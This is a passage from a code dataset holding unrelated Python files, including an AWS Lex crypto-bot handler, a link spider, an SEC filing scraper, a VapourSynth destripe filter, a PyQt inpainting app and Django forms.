steels\n\nFrom matminer's dataset library.\n\"\"\"\n\nfrom matminer.datasets.dataset_retrieval import load_dataset\n\n\nif __name__ == \"__main__\":\n df = load_dataset(\"steel_strength\")\n df = df[[\"formula\", \"yield strength\"]]\n df = df.rename(columns={\"formula\": \"composition\"})\n print(df)\n df.to_pickle(\"steels.pickle.gz\")\n","repo_name":"hackingmaterials/automatminer","sub_path":"automatminer_dev/matbench/steels.py","file_name":"steels.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":131,"dataset":"github-code","pt":"34"} +{"seq_id":"74062385376","text":"### Required Libraries ###\nfrom datetime import datetime\n### Required Libraries ###\nfrom datetime import datetime\nfrom dateutil.relativedelta import relativedelta\n\n### Functionality Helper Functions ###\ndef parse_int(n):\n \"\"\"\n Securely converts a non-integer value to integer.\n \"\"\"\n try:\n return int(n)\n except ValueError:\n return float(\"nan\")\n\n\ndef build_validation_result(is_valid, violated_slot, message_content):\n \"\"\"\n Define a result message structured as Lex response.\n \"\"\"\n if message_content is None:\n return {\"isValid\": is_valid, \"violatedSlot\": violated_slot}\n\n return {\n \"isValid\": is_valid,\n \"violatedSlot\": violated_slot,\n \"message\": {\"contentType\": \"PlainText\", \"content\": message_content},\n }\n\ndef validate_data(age, investment_amount, intent_request):\n \"\"\"\n Validates the data provided by the user.\n \"\"\"\n\n # Validate that the user is over 18 years old\n if age is not None:\n age = parse_int(age)\n if age < 18:\n return build_validation_result(\n False,\n \"age\",\n \"You should be at least 18 years old to use this service, please provide a different age.\",\n )\n \n\n # Validate the investment amount, it should be > 1000\n if investment_amount is not None:\n investment_amount = parse_int(\n investment_amount\n ) \n # Since parameters are strings it's important to cast values\n if investment_amount <= 1000:\n return build_validation_result(\n False,\n \"InvestmentAmount\",\n \"The amount to invest should be greater than 1000, please provide a correct amount in USD.\",\n )\n\n # A True results is returned if age or amount are valid\n return build_validation_result(True, None, None)\n\n### Dialog Actions Helper Functions ###\ndef get_slots(intent_request):\n \"\"\"\n Fetch all the slots and their values from the current intent.\n \"\"\"\n return intent_request[\"currentIntent\"][\"slots\"]\n\n\ndef elicit_slot(session_attributes, intent_name, slots, slot_to_elicit, message):\n \"\"\"\n Defines an elicit slot type response.\n \"\"\"\n\n return {\n \"sessionAttributes\": session_attributes,\n \"dialogAction\": {\n \"type\": \"ElicitSlot\",\n \"intentName\": intent_name,\n \"slots\": slots,\n \"slotToElicit\": slot_to_elicit,\n \"message\": message,\n },\n }\n\n\ndef delegate(session_attributes, slots):\n \"\"\"\n Defines a delegate slot type response.\n \"\"\"\n\n return {\n \"sessionAttributes\": session_attributes,\n \"dialogAction\": {\"type\": \"Delegate\", \"slots\": slots},\n }\n\n\ndef close(session_attributes, fulfillment_state, message):\n \"\"\"\n Defines a close slot type response.\n \"\"\"\n\n response = {\n \"sessionAttributes\": session_attributes,\n \"dialogAction\": {\n \"type\": \"Close\",\n \"fulfillmentState\": fulfillment_state,\n \"message\": message,\n },\n }\n\n return response\n\n\n### Intents Handlers ###\ndef Cryptotrader(intent_request):\n \"\"\"\n Performs dialog 
management and fulfillment for Trading bot.\n \"\"\"\n\n first_name = get_slots(intent_request)[\"firstName\"]\n age = get_slots(intent_request)[\"age\"]\n investment_amount = get_slots(intent_request)[\"InvestmentAmount\"]\n value = get_slots(intent_request)[\"value\"]\n source = intent_request[\"invocationSource\"]\n\n if source == \"DialogCodeHook\":\n # Perform basic validation on the supplied input slots.\n # Use the elicitSlot dialog action to re-prompt\n # for the first violation detected.\n\n ### DATA VALIDATION CODE STARTS HERE ###\n validation_result = validate_data(age, investment_amount, intent_request)\n \n if not validation_result[\"isValid\"]:\n return elicit_slot( intent_request[\"sessionAttributes\"],\n intent_request[\"currentIntent\"][\"name\"],\n get_slots(intent_request),\n validation_result[\"violatedSlot\"],\n validation_result[\"message\"]\n )\n \n ### DATA VALIDATION CODE ENDS HERE ###\n\n # Fetch current session attibutes\n output_session_attributes = intent_request[\"sessionAttributes\"]\n\n return delegate(output_session_attributes, get_slots(intent_request))\n\n # Get the initial Crypro value recommendation\n\n ### Crypro value RECOMMENDATION CODE STARTS HERE ###\n\n if value == 'Ethereum':\n initial_recommendation = 'at $200 available on the model section of our website.'\n if value == 'Bitcoin':\n initial_recommendation ='at $200 available on the model section of our website.'\n\n \n ### Crypro value RECOMMENDATION CODE ENDS HERE ###\n\n\n # Return a message with the initial recommendation based on the value.\n return close(\n intent_request[\"sessionAttributes\"],\n \"Fulfilled\",\n {\n \"contentType\": \"PlainText\",\n \"content\": \"\"\"{} thank you for answering.\n Based on the value you selected, my recommendation is to purchase our Golden Cross Support vector machine model {}\n \"\"\".format(\n first_name, initial_recommendation\n ),\n },\n )\n\n \n### Intents Dispatcher ###\ndef dispatch(intent_request):\n \"\"\"\n Called when the user specifies an intent for this bot.\n \"\"\"\n\n intent_name = intent_request[\"currentIntent\"][\"name\"]\n\n # Dispatch to bot's intent handlers\n if intent_name == \"Cryptotrader\":\n return Cryptotrader(intent_request)\n\n raise Exception(\"Intent with name \" + intent_name + \" not supported\")\n\n\n### Main Handler ###\ndef lambda_handler(event, context):\n \"\"\"\n Route the incoming request based on intent.\n The JSON body of the request is provided in the event slot.\n \"\"\"\n\n return dispatch(event)","repo_name":"ijmelhorn/AWS-Bot-Trading-Algos","sub_path":"Trading Bot/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":6025,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"72322644578","text":"import base64\nbase64_img=\"\"\n\nwith open('C:/Users/ace02/Desktop/Something/debai.png', 'rb') as binary_file:\n binary_file_data = binary_file.read()\n base64_encoded_data = base64.b64encode(binary_file_data)\n base64_message = base64_encoded_data.decode('utf-8')\n base64_img=base64_message\n print(\"Ok\")\n\n\nbase64_img_bytes = base64_img.encode('utf-8')\nwith open('decoded_image.png', 'wb') as file_to_save:\n decoded_image_data = base64.decodebytes(base64_img_bytes)\n 
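# --- Editor's aside (not a dataset record): parse_int in the Lex handler above
# falls back to float("nan"), and every comparison against NaN is False, so a
# non-numeric age slips past the `age < 18` check without triggering the
# validation message. A minimal reproduction of that behavior:
import math

def parse_int(n):
    try:
        return int(n)
    except ValueError:
        return float("nan")

age = parse_int("abc")
assert math.isnan(age) and not (age < 18)   # the < 18 guard never fires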
file_to_save.write(decoded_image_data)\n\n#https://stackabuse.com/encoding-and-decoding-base64-strings-in-python/","repo_name":"duydung271/WebAI","sub_path":"ModelAPI/encode_decode_image.py","file_name":"encode_decode_image.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"29224429750","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom src.db import DB\nfrom src.db.links import Links\n\n\ndef spider(page_id):\n\n ''' Takes a page id, selects the url linked to page id and runs the scraper\n Scraper takes url and returns a list of urls scraped,\n a maximum of 10 links are inserted into the database '''\n\n if type(page_id) != int or page_id == 0:\n raise ValueError('Page Id is not valid')\n\n get_url = DB.pages().get_url(page_id)\n\n if get_url is None:\n return ValueError('Page Id not found')\n\n else:\n url = get_url[0]\n all_links = []\n\n # set is_scraping to True where id == page_id\n DB.pages().update_by_id(True, page_id)\n\n res = requests.get(url)\n soup = BeautifulSoup(res.text, 'html.parser')\n\n for link in soup.find_all('a', href=True):\n\n if link['href'].startswith('http'):\n all_links.append(link['href'])\n\n # check if page id is in already in links table, delete all data with page id\n DB.links().delete_by_page_id(page_id)\n\n for link in all_links[:10]:\n # Insert each link into the links table\n Links(DB().connect()).insert(page_id, link)\n\n # set is_scraping to False in where id == page_id\n DB.pages().update_by_id(False, page_id)\n\n","repo_name":"Resa-Obamwonyi/spider-pyapp","sub_path":"src/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"18337566699","text":"import numpy as np\n\nfrom kiox.episode import EpisodeManager\nfrom kiox.step import PartialStep, StepBuffer\nfrom kiox.transition import SimpleLazyTransition\nfrom kiox.transition_buffer import UnlimitedTransitionBuffer\n\n\nclass StepFactory:\n def __init__(\n self,\n observation_shape=(100,),\n action_type=\"continuous\",\n action_size=4,\n ):\n self.observation_shape = observation_shape\n self.action_type = action_type\n self.action_size = action_size\n\n def __call__(self, terminal=False):\n if self.action_type == \"continuous\":\n action = np.random.random(self.action_size)\n elif self.action_type == \"discrete\":\n action = np.random.randint(self.action_size)\n else:\n raise ValueError(f\"invalid action type: {self.action_type}\")\n\n if isinstance(self.observation_shape[0], int):\n observation = np.random.random(self.observation_shape)\n else:\n observation = [\n np.random.random(shape) for shape in self.observation_shape\n ]\n\n partial_step = PartialStep(\n observation=observation,\n action=action,\n reward=np.random.random(),\n terminal=1.0 if terminal else 0.0,\n )\n\n return partial_step\n\n def fill(self, n_steps):\n for _ in range(n_steps):\n self.__call__()\n\n\nclass TransitionFactory:\n def __init__(self, step_factory):\n self.step_factory = step_factory\n self.step_buffer = StepBuffer()\n self.episode_manager = EpisodeManager(\n self.step_buffer, UnlimitedTransitionBuffer()\n )\n self.prev_step = self.episode_manager.append_step(step_factory())\n\n def __call__(self, terminal=False):\n partial_step = self.step_factory()\n step = self.episode_manager.append_step(partial_step)\n transition = SimpleLazyTransition(\n self.prev_step.idx,\n None if 
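# --- Editor's aside (illustrative, not a dataset record): the encode/decode
# record above goes bytes -> b64encode -> utf-8 str and back via decodebytes;
# the same round trip checked in memory, without touching the filesystem:
import base64

payload = b"\x89PNG fake image bytes"
encoded = base64.b64encode(payload).decode("utf-8")
assert base64.decodebytes(encoded.encode("utf-8")) == payload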
terminal else step.idx,\n multi_step_reward=np.random.random(),\n duration=1,\n )\n self.prev_step = step\n return transition\n","repo_name":"takuseno/kiox","sub_path":"tests/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74176131937","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 27 17:53:16 2020\n\n@author: yuxinfan\n\"\"\"\n\nimport pandas as pd\nimport os\n\nos.getcwd()\nos.chdir(\"/Users/yuxinfan/471Project\")\n\n# input our htmlindex file generated from last step\npath='htmlindex.csv'\ndf=pd.read_csv(path)\ndataset = df.copy()\ndataset = dataset.dropna(subset=['Datelist'])\ndataset['year'] = pd.DatetimeIndex(dataset['Datelist']).year\ndataset['month'] = pd.DatetimeIndex(dataset['Datelist']).month\ndataset['day'] = pd.DatetimeIndex(dataset['Datelist']).day\ndataset = dataset[dataset.year != 2016]\ndataset = dataset[dataset.year != 2017]\n\n# Generate 10-K url \ndataset_10K = dataset[dataset['Typelist'] == '10-K']\nurllist = []\n\nfor num in range(0,len(dataset_10K['Htmllist'])):\n print(num)\n index = list(dataset_10K['Htmllist'])[num]\n CIK = list(dataset_10K['CIKlist'])[num]\n Filing = index.split(\"|\")\n for item in Filing:\n if 'html' in item:\n report = item\n url = 'https://www.sec.gov/Archives/' + report\n df1 = pd.read_html(url)\n document_index = df1[0]\n document_index = document_index.dropna(subset=['Type'])\n document_name = document_index[document_index['Type'].str.contains('10-K')]\n document_name = document_name['Document'].str.split(' ')\n document_name = document_name[0][0]\n report_formatted = report.replace('-','').replace('index.html','')\n url = 'https://www.sec.gov/Archives/' + report_formatted + '/' + document_name\n urllist.append(url)\n\ndataset_10K['urllist'] = urllist\n\n\n\n \n\n \n \n \n \n \n \n \n \n \n \n \n \n","repo_name":"yx-fan/Sentimental_analysis_in_stock_trading","sub_path":"PythonCode/P2.py","file_name":"P2.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"5655575156","text":"import vapoursynth as vs\r\nfrom functools import partial\r\nfrom typing import Callable, List, Union\r\ncore = vs.core\r\n\r\ndef Destripe(clip: vs.VideoNode,\r\n width: int = 1280,\r\n height: int = 360,\r\n kernel: str = 'bicubic',\r\n b: float = 0,\r\n c: float = 1/2,\r\n taps: int = 3,\r\n src_left: Union[float, List[float]] = [0.0, 0.0],\r\n src_top: Union[float, List[float]] = [0.0, 0.0],\r\n src_width: Union[float, List[float]] = [0.0, 0.0],\r\n src_height: Union[float, List[float]] = [0.0, 0.0],\r\n fix_top: Union[int, List[int]] = [0, 0],\r\n fix_bottom: Union[int, List[int]] = [0, 0],\r\n showdiff: bool = False) -> Union[vs.VideoNode, List[vs.VideoNode]]:\r\n y = clip if clip.format.color_family == vs.GRAY else core.std.ShufflePlanes(clip, 0, vs.GRAY)\r\n kernel = kernel.lower()\r\n if kernel.startswith('de'):\r\n kernel = kernel[2:]\r\n if not isinstance(src_left, list):\r\n src_left = [src_left, src_left]\r\n if not isinstance(src_top, list):\r\n src_top = [src_top, src_top]\r\n if not isinstance(src_width, list):\r\n src_width = [src_width, src_width]\r\n src_width = [width if v <= 0 else v for v in src_width]\r\n if not isinstance(src_height, list):\r\n src_height = [src_height, src_height]\r\n src_height = [height if v <= 0 else v for v in src_height]\r\n if not 
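# --- Editor's aside (not a dataset record): the 10-K scraper above drops 2016
# and 2017 with two chained boolean filters; pandas' isin does the same in one
# mask. A tiny self-check on a stand-in frame:
import pandas as pd

df = pd.DataFrame({"year": [2015, 2016, 2017, 2018]})
df = df[~df["year"].isin([2016, 2017])]
assert df["year"].tolist() == [2015, 2018]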
isinstance(fix_top, list):\r\n fix_top = [fix_top, fix_top]\r\n if not isinstance(fix_bottom, list):\r\n fix_bottom = [fix_bottom, fix_bottom]\r\n\r\n isfloat = (y.format.sample_type == vs.FLOAT and y.format.bits_per_sample == 32)\r\n sep = core.std.SeparateFields(y, True).std.SetFrameProp('_Field', delete=True)\r\n st = sep[0::2]\r\n sb = sep[1::2]\r\n if fix_top[0] > 0 or fix_bottom[0] > 0:\r\n st16 = core.resize.Point(st, format=vs.GRAY16, dither_type='error_diffusion')\r\n st32 = core.edgefixer.Continuity(st16, top=fix_top[0], bottom=fix_bottom[0]).resize.Point(format=vs.GRAYS)\r\n elif isfloat:\r\n st32 = st\r\n else:\r\n st32 = core.resize.Point(st, format=vs.GRAYS)\r\n if fix_top[1] > 0 or fix_bottom[1] > 0:\r\n sb16 = core.resize.Point(sb, format=vs.GRAY16, dither_type='error_diffusion')\r\n sb32 = core.edgefixer.Continuity(sb16, top=fix_top[1], bottom=fix_bottom[1]).resize.Point(format=vs.GRAYS)\r\n elif isfloat:\r\n sb32 = sb\r\n else:\r\n sb32 = core.resize.Point(sb, format=vs.GRAYS)\r\n\r\n if showdiff:\r\n downt, difft = _Descale(st32, width, height, kernel, b, c, taps, src_left[0], src_top[0], src_width[0], src_height[0], True)\r\n downb, diffb = _Descale(sb32, width, height, kernel, b, c, taps, src_left[1], src_top[1], src_width[1], src_height[1], True)\r\n down = _Weave(downt, downb)\r\n diff = _Weave(difft, diffb)\r\n if isfloat:\r\n return [down, diff]\r\n else:\r\n downi = core.resize.Point(down, format=y.format, dither_type='error_diffusion')\r\n diffi = core.resize.Point(diff, format=y.format, range_in_s='limited', range_s='full')\r\n return [downi, diffi]\r\n else:\r\n downt = _Descale(st32, width, height, kernel, b, c, taps, src_left[0], src_top[0], src_width[0], src_height[0], False)\r\n downb = _Descale(sb32, width, height, kernel, b, c, taps, src_left[1], src_top[1], src_width[1], src_height[1], False)\r\n down = _Weave(downt, downb)\r\n if isfloat:\r\n return down\r\n else:\r\n downi = core.resize.Point(down, format=y.format, dither_type='error_diffusion')\r\n return downi\r\n\r\ndef _Weave(clipa: vs.VideoNode, clipb: vs.VideoNode) -> vs.VideoNode:\r\n clip = core.std.Interleave([clipa, clipb])\r\n wv = core.std.DoubleWeave(clip, True)[0::2]\r\n return wv.std.SetFrameProp('_FieldBased', intval=0)\r\n\r\ndef _GetDescaler(kernel: str,\r\n b: float,\r\n c: float,\r\n taps: int,\r\n src_left: float,\r\n src_top: float,\r\n src_width: float,\r\n src_height: float) -> Callable[[vs.VideoNode, int, int], vs.VideoNode]:\r\n if kernel == 'bilinear':\r\n return partial(core.descale.Debilinear, src_left=src_left, src_top=src_top, src_width=src_width, src_height=src_height)\r\n elif kernel == 'bicubic':\r\n return partial(core.descale.Debicubic, b=b, c=c, src_left=src_left, src_top=src_top, src_width=src_width, src_height=src_height)\r\n elif kernel == 'lanczos':\r\n return partial(core.descale.Delanczos, taps=taps, src_left=src_left, src_top=src_top, src_width=src_width, src_height=src_height)\r\n elif kernel == 'spline16':\r\n return partial(core.descale.Despline16, src_left=src_left, src_top=src_top, src_width=src_width, src_height=src_height)\r\n elif kernel == 'spline36':\r\n return partial(core.descale.Despline36, src_left=src_left, src_top=src_top, src_width=src_width, src_height=src_height)\r\n elif kernel == 'spline64':\r\n return partial(core.descale.Despline64, src_left=src_left, src_top=src_top, src_width=src_width, src_height=src_height)\r\n else:\r\n raise ValueError('descale: Invalid kernel specified.')\r\n\r\ndef _GetResizer(kernel: str,\r\n b: float,\r\n c: 
float,\r\n taps: int,\r\n src_left: float,\r\n src_top: float,\r\n src_width: float,\r\n src_height: float) -> Callable[[vs.VideoNode, int, int], vs.VideoNode]:\r\n if kernel == 'bilinear':\r\n return partial(core.resize.Bilinear, src_left=src_left, src_top=src_top, src_width=src_width, src_height=src_height)\r\n elif kernel == 'bicubic':\r\n return partial(core.resize.Bicubic, filter_param_a=b, filter_param_b=c, src_left=src_left, src_top=src_top, src_width=src_width, src_height=src_height)\r\n elif kernel == 'lanczos':\r\n return partial(core.resize.Lanczos, filter_param_a=taps, src_left=src_left, src_top=src_top, src_width=src_width, src_height=src_height)\r\n elif kernel == 'spline16':\r\n return partial(core.resize.Spline16, src_left=src_left, src_top=src_top, src_width=src_width, src_height=src_height)\r\n elif kernel == 'spline36':\r\n return partial(core.resize.Spline36, src_left=src_left, src_top=src_top, src_width=src_width, src_height=src_height)\r\n elif kernel == 'spline64':\r\n return partial(core.resize.Spline64, src_left=src_left, src_top=src_top, src_width=src_width, src_height=src_height)\r\n else:\r\n raise ValueError('resize: Invalid kernel specified.')\r\n\r\ndef _Descale(clip: vs.VideoNode,\r\n width: int,\r\n height: int,\r\n kernel: str,\r\n b: float,\r\n c: float,\r\n taps: int,\r\n src_left: float,\r\n src_top: float,\r\n src_width: float,\r\n src_height: float,\r\n showdiff: bool) -> Union[vs.VideoNode, List[vs.VideoNode]]:\r\n descaler = _GetDescaler(kernel, b, c, taps, src_left, src_top, src_width, src_height)\r\n down = descaler(clip, width, height)\r\n if showdiff:\r\n resizer = _GetResizer(kernel, b, c, taps, src_left, src_top, src_width, src_height)\r\n up = resizer(down, clip.width, clip.height)\r\n diff = core.std.Expr([clip, up], 'x y - abs')\r\n return [down, diff]\r\n else:\r\n return down\r\n","repo_name":"ChihayaLab/VapourSynth-Destripe","sub_path":"destripe.py","file_name":"destripe.py","file_ext":"py","file_size_in_byte":7443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"34"} +{"seq_id":"114438642","text":"from applications.DataFacadeOOB.code.ActionDefinition.analyze_trends.python.ExecutionHandler import ExecutionHandler\n\nfrom tests.helpers import load_data\n\n\ndef test_analyze_trends():\n handler = ExecutionHandler()\n inp = load_data(\"iris.csv\")\n result = handler.execute(data=inp, dim_columns=[\"species\"], target_col=\"sepal_length\", agg_function=\"sum\")\n assert result is not None\n","repo_name":"sb-datafacade/df-lib","sub_path":"old/tests/tests_common_actions/test_analyze_trends.py","file_name":"test_analyze_trends.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"26722487688","text":"import sys\nfrom typing import Optional\nfrom PyQt5.QtCore import Qt, QSize, QTimer\nfrom PyQt5.QtGui import QColor, QFont, QImage, QPainter, QPixmap, QMovie\nfrom PyQt5.QtWidgets import (\n QApplication,\n QComboBox,\n QFileDialog,\n QGridLayout,\n QLabel,\n QMainWindow,\n QPushButton,\n QStatusBar,\n QWidget,\n)\nfrom app.inpaint import inpaint_algorithms, file_has_graphic_extension, cv, np\nfrom threading import Thread\n\nCOMBO_MAP = {\n 'Skimage-biharmonic': 5,\n 'OpenCV-Shiftmap': 4,\n 'OpenCV-NS': 0,\n 'OpenCV-TELEA': 1,\n 'OpenCV-FSR fast': 2,\n 'OpenCV-FSR best': 3,\n}\n\n\nclass ImageLabel(QLabel):\n def __init__(self):\n super().__init__()\n self.setAlignment(Qt.AlignCenter)\n self.setText('Drop image to 
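# --- Editor's aside (illustrative, not a dataset record): Destripe above
# splits separated fields with sep[0::2] / sep[1::2] and re-interleaves them in
# _Weave; the same step-2 slice and merge, shown on a plain list:
frames = ["top0", "bot0", "top1", "bot1"]
top, bottom = frames[0::2], frames[1::2]
rewoven = [f for pair in zip(top, bottom) for f in pair]
assert rewoven == frames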
inpaint here')\n self.setStyleSheet('''QLabel{border: 4px dashed #aaa}''')\n\n\nclass Canvas(QLabel):\n def __init__(self, w, h):\n super().__init__()\n self.mask_array = np.zeros(shape=(h, w, 1), dtype=np.uint8)\n pixmap = QPixmap(w, h)\n pixmap.fill(Qt.transparent)\n self.setPixmap(pixmap)\n\n self.last_x, self.last_y = None, None\n self.pen_color = Qt.white\n\n def set_pen_color(self, c):\n self.pen_color = QColor(c)\n\n def mouseMoveEvent(self, e):\n if self.last_x is None: # First event.\n self.last_x = e.x()\n self.last_y = e.y()\n return # Ignore the first time.\n\n painter = QPainter(self.pixmap())\n painter.setOpacity(0.2)\n p = painter.pen()\n p.setWidth(7)\n p.setColor(self.pen_color)\n painter.setPen(p)\n painter.drawLine(self.last_x, self.last_y, e.x(), e.y())\n painter.end()\n self.update()\n try:\n self.mask_array[self.last_y, self.last_x] = 255\n self.mask_array[e.y(), e.x()] = 255\n except IndexError:\n pass\n\n # Update the origin for next time.\n self.last_x = e.x()\n self.last_y = e.y()\n\n def mouseReleaseEvent(self, e):\n self.last_x = None\n self.last_y = None\n\n\nclass MainWindow(QMainWindow):\n path_original: Optional[str] = \"\"\n path_mask: Optional[str] = \"\"\n path_saving: Optional[str] = \"\"\n img_inpainted = None\n img_mask = None\n canvas = None\n\n def __init__(self):\n super().__init__(parent=None)\n self.setWindowTitle(\"Inpaint app\")\n self.resize(1024, 600)\n self.setAcceptDrops(True)\n # initialize ui fields\n self.drag_image = ImageLabel()\n self.image_after = QLabel(\"After inpaint the result will be displayed here\")\n self.image_after.setAlignment(Qt.AlignCenter)\n self.btn_inpaint = QPushButton(\"Make inpaint with specified algorithm:\")\n self.btn_inpaint.clicked.connect(self.inpaint_click)\n self.btn_mask = QPushButton(\"Upload proper mask for image\")\n self.btn_mask.clicked.connect(self.mask_click)\n self.btn_save = QPushButton(\"Save inpainted image\")\n self.btn_save.clicked.connect(self.save_click)\n self.combobox_inpaint = QComboBox()\n self.combobox_inpaint.addItems(COMBO_MAP.keys())\n self.btn_add_mask = QPushButton(\"Manually create mask on current image (not recommended)\")\n self.btn_add_mask.clicked.connect(self.add_mask_click)\n self.btn_upload_mask = QPushButton(\"Upload mask added manually (not recommended)\")\n self.btn_upload_mask.clicked.connect(self.upload_mask_click)\n self.movie = QMovie(\"../assets/loading.gif\")\n self.loading_gif = QLabel()\n self.loading_gif.setMovie(self.movie)\n self.loading_gif.setAlignment(Qt.AlignCenter)\n # set layout and widgets\n self.layout = QGridLayout()\n self.widget = QWidget()\n self.layout.addWidget(self.btn_inpaint, 0, 0)\n self.layout.addWidget(self.combobox_inpaint, 0, 1)\n self.layout.addWidget(self.btn_mask, 1, 0)\n self.layout.addWidget(self.btn_save, 1, 1)\n self.layout.addWidget(self.drag_image, 2, 0)\n self.layout.addWidget(self.image_after, 2, 1)\n self.layout.addWidget(self.loading_gif, 2, 1)\n self.layout.addWidget(self.btn_add_mask, 3, 0)\n self.layout.addWidget(self.btn_upload_mask, 3, 1)\n self.widget.setLayout(self.layout)\n\n self.setCentralWidget(self.widget)\n self.create_menu()\n self.statusBar().setStyleSheet(\"background-color : #e6e6e6; border :1px inset #c7c7c7;\")\n\n def create_menu(self):\n menu = self.menuBar().addMenu(\"&Menu\")\n help = self.menuBar().addMenu(\"Help\")\n menu.addAction(\"&Exit\", self.close)\n # help.addAction()\n\n def _createStatusBar(self):\n self.status_bar = QStatusBar()\n self.setStatusBar(self.status_bar)\n\n def 
display_status_bar_message(self, message):\n self.statusBar().showMessage(message)\n self.statusBar().show()\n QTimer.singleShot(5000, self.statusBar().clearMessage)\n\n def dragEnterEvent(self, event):\n if event.mimeData().hasImage:\n event.accept()\n else:\n event.ignore()\n\n def dragMoveEvent(self, event):\n if event.mimeData().hasImage:\n event.accept()\n else:\n event.ignore()\n\n def dropEvent(self, event):\n if event.mimeData().hasImage:\n event.setDropAction(Qt.CopyAction)\n file_path = event.mimeData().urls()[0].toLocalFile()\n if not file_has_graphic_extension(file_path):\n self.display_status_bar_message(\"File must have graphic extension like .png\")\n return\n self.path_original = file_path\n self.set_image(file_path)\n if self.canvas:\n self.canvas.close()\n self.canvas = None\n self.img_mask = None\n event.accept()\n else:\n event.ignore()\n\n def set_image(self, file_path):\n image = QPixmap(file_path)\n image = image.scaled(512, 512, Qt.KeepAspectRatio, Qt.FastTransformation)\n self.drag_image.setPixmap(image)\n\n def movie_start(self):\n self.display_status_bar_message(\"Loading\")\n self.movie.setScaledSize(QSize().scaled(150, 150, Qt.KeepAspectRatio))\n self.movie.start()\n self.loading_gif.show()\n self.image_after.setText(\"\")\n\n def movie_stop(self):\n self.movie.stop()\n self.loading_gif.hide()\n self.image_after.show()\n self.display_status_bar_message(\"Inpainted successfully\")\n\n def inpaint_click(self):\n if self.path_original and (self.path_mask or self.img_mask is not None):\n self.movie_start()\n thread = Thread(target=self.inpaint_operation)\n thread.start()\n elif not self.path_original:\n self.display_status_bar_message(f\"Please upload image to inpaint\")\n else:\n self.display_status_bar_message(f\"Please upload mask of image to inpaint\")\n\n def inpaint_operation(self):\n inpaint_flag = COMBO_MAP[self.combobox_inpaint.currentText()]\n try:\n self.img_inpainted = inpaint_algorithms(\n img_path=self.path_original,\n mask_path=self.path_mask if self.path_mask else None,\n img_mask=self.img_mask,\n flag=inpaint_flag,\n )\n except Exception as e:\n self.image_after.hide()\n self.display_status_bar_message(f\"Error while inpainting: {e}\")\n finally:\n self.movie_stop()\n image_after = QImage(\n self.img_inpainted,\n self.img_inpainted.shape[1],\n self.img_inpainted.shape[0],\n self.img_inpainted.shape[1] * 3,\n QImage.Format_RGB888\n )\n pixmap_img_after = QPixmap(image_after)\n pixmap_img_after = pixmap_img_after.scaled(512, 512, Qt.KeepAspectRatio, Qt.FastTransformation)\n self.image_after.setPixmap(pixmap_img_after)\n\n def mask_click(self):\n mask_path, _ = QFileDialog.getOpenFileName(self, \"Select mask for image\", self.path_original, \"All Files (*)\")\n if mask_path:\n if not file_has_graphic_extension(mask_path):\n self.display_status_bar_message(\"File must have graphic extension like .png\")\n return\n self.path_mask = mask_path\n self.btn_mask.setText(\"Replace loaded mask\")\n\n def save_click(self):\n if self.img_inpainted is None:\n self.display_status_bar_message(f\"You must make proper inpaint first\")\n return\n path_saving = QFileDialog.getSaveFileName(\n self,\n \"Save inpainted image\",\n f\"{self.path_original}/inpainted_image\",\n \"All Files (*)\"\n )\n if path_saving[0]:\n try:\n cv.imwrite(f'{path_saving[0]}.jpg', cv.cvtColor(self.img_inpainted, cv.COLOR_BGR2RGB))\n self.display_status_bar_message(f\"Successfully saved in {path_saving[0]}\")\n except Exception as e:\n self.display_status_bar_message(f\"Error while saving: 
{e}\")\n\n def add_mask_click(self):\n if not self.path_original:\n self.display_status_bar_message(\"First you need to add image to inpaint\")\n return\n elif self.canvas:\n self.canvas.close()\n self.canvas = None\n self.canvas = Canvas(self.drag_image.width(), self.drag_image.height())\n self.layout.addWidget(self.canvas, 2, 0, alignment=Qt.AlignCenter)\n self.combobox_inpaint.setCurrentIndex(1)\n\n def upload_mask_click(self):\n if self.canvas is None:\n self.display_status_bar_message('Before uploading mask you must create it ')\n return\n self.img_mask = self.canvas.mask_array\n if self.path_mask:\n self.path_mask = \"\"\n self.btn_mask.setText(\"Replace loaded mask\")\n self.display_status_bar_message('Uploaded created mask to memory. See results with \"Make inpaint\" button')\n","repo_name":"radek-szpot/inpaint","sub_path":"app/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":10067,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"16165469585","text":"from django.urls import path\nfrom .views import PostsListView, PostDetailView, PostCreateView, PostUpdateView, PostDeleteView\n\nurlpatterns = [\n path('posts/', PostsListView.as_view(), name='posts_list_url'),\n path('post/create/', PostCreateView.as_view(), name='post_create_url'),\n path('post//', PostDetailView.as_view(), name='post_detail_url'),\n path('post//update/', PostUpdateView.as_view(), name='post_update_url'),\n path('post//delete/', PostDeleteView.as_view(), name='post_delete_url'),\n]\n","repo_name":"leondav1/django_blog","sub_path":"app_blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72327049378","text":"from django import forms\nfrom django.contrib.auth.forms import UserCreationForm\n\nfrom .models import Comment, Webpage, Template, User\n\n\nclass CommentForm(forms.ModelForm):\n class Meta:\n model = Comment\n fields = ['title', 'content']\n\n\nclass WebpageForm(forms.ModelForm):\n class Meta:\n model = Webpage\n fields = [\n 'name', 'template_used', 'user_title',\n 'user_text_1', 'user_text_2', 'user_text_3',\n 'user_image_1', 'user_image_2', 'user_image_3'\n 